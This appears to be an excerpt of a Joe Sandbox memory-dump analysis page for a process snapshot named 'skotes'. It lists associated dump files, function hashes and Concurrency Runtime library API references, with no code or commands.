Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
String ID:
API String ID: 2508902052-0
Opcode ID: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
Instruction ID: f23b5df330f0c97540acf35bb3dd439d591a941183c0d86b8d835bf4cb513729
Opcode Fuzzy Hash: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
Instruction Fuzzy Hash: C1813872E006269FCB19DFA8C580A6DB7F5BF88704F1586ADD449AB701C770ED52CB84

Function 0097EC48 Relevance: 6.1, APIs: 4, Instructions: 139COMMON

Download Yara Rule

APIs

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0097EC81

Part of subcall function 00978F2F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00978F50

Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 0097ECE7
Concurrency::details::WorkItem::ResolveToken.LIBCONCRT ref: 0097ECFF
Concurrency::details::WorkItem::BindTo.LIBCONCRT ref: 0097ED0C

Part of subcall function 0097E7AF: Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 0097E7D7
Part of subcall function 0097E7AF: Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 0097E86F
Part of subcall function 0097E7AF: Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0097E879
Part of subcall function 0097E7AF: Concurrency::location::_Assign.LIBCMT ref: 0097E8AD
Part of subcall function 0097E7AF: Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0097E8B5

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::Context$Scheduler$EventInternalItem::ProcessorVirtualWork$ActiveAssignBindCommitConcurrency::location::_GroupPointsReclaimResolveRunnableSafeScheduleSegmentThrowTokenTraceTrigger
String ID:
API String ID: 2363638799-0
Opcode ID: b4093466020691150f3c9b855def5f8ead1b3390824664f0229fe1d6402b9aa3
Instruction ID: 9538be47771230500cbf06ac85e0b5e64faa5a3f6567d6ee4973c15808b50823
Opcode Fuzzy Hash: b4093466020691150f3c9b855def5f8ead1b3390824664f0229fe1d6402b9aa3
Instruction Fuzzy Hash: E6518432A00205DBDF24DF50C896BADB775AF88310F1580A9E90A7B3D2CB75AE05CB91

Function 0096CB97 Relevance: 1.5, APIs: 1, Instructions: 9nativeCOMMON

Download Yara Rule

APIs

NtFlushProcessWriteBuffers.NTDLL ref: 0096CBAA

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: BuffersFlushProcessWrite
String ID:
API String ID: 2982998374-0
Opcode ID: 80eedc8b3011a67dc66525a1da082fd07aec87f4aaac41a9cfa96876c915a42c
Instruction ID: 71a80b0e56305f76fe3754e5d05446b8e8d10c672cd6c2ad149be6d366439e8b
Opcode Fuzzy Hash: 80eedc8b3011a67dc66525a1da082fd07aec87f4aaac41a9cfa96876c915a42c
Instruction Fuzzy Hash: B1B09232A2B93087CA912B64BC086AD77189F81B2130A4256E841A72248A101D82ABD4

Function 0096DD91 Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e1784ebf6f157ed710b506f5be09ffc505256d837b9b6c743f9f7376779b158
Instruction ID: 457db6f07fe262b8fcf1d045f77871b7b54e7a989b028fca2a616b422cad545f
Opcode Fuzzy Hash: 3e1784ebf6f157ed710b506f5be09ffc505256d837b9b6c743f9f7376779b158
Instruction Fuzzy Hash: 0F51DFB2E26606CFDB15CF98D9807AEB7F5FB58320F24866AC419EB250D335A900CF50

Function 009826D1 Relevance: 22.7, APIs: 15, Instructions: 231COMMON

Download Yara Rule

APIs

Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 009826E3

Part of subcall function 009824E1: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00982504

Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 00982704
Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 00982711
Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 0098275F
Concurrency::details::SchedulerBase::AcquireQuickCacheSlot.LIBCMT ref: 009827E6
Concurrency::details::WorkSearchContext::QuickSearch.LIBCMT ref: 009827F9
Concurrency::details::WorkSearchContext::SearchCacheLocal_Runnables.LIBCONCRT ref: 00982846

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
